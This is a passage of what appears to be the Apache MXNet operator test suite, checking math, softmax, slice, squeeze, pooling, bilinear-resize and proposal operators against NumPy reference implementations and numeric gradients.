0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
    shape = (9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
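    # Cover every combination of the three normalization modes: 'null' leaves
    # gradients unscaled, 'batch' divides by batch_size, and 'valid' divides by
    # the number of non-ignored labels.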
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
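    # For reference: a Python index like (slice(1, 10, 2), slice(3, 9)) maps to
    # begin=[1, 3], end=[10, 9], step=[2, None] in mx.nd.slice / mx.sym.slice.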
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
        B, C, _, _ = x.shape
        y = np.empty([B, C, height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
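    # The bin boundaries above follow istart = floor(o * isize / osize) and
    # iend = ceil((o + 1) * isize / osize); e.g. isize=10, osize=3 yields the
    # overlapping bins [0, 4), [3, 7), [6, 10).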
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
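    # Each output pixel above is a 2x2 bilinear blend; e.g. with h1lambda=0.25
    # and w1lambda=0.5 the four corner weights are 0.375, 0.375, 0.125, 0.125
    # (they always sum to 1).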
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
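        # Proposal selection is not differentiable, so the op is expected to
        # back-propagate zeros to all three inputs.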
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
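            # d/dx (a*x**2 + b*x + c) = 2*a*x + b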
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
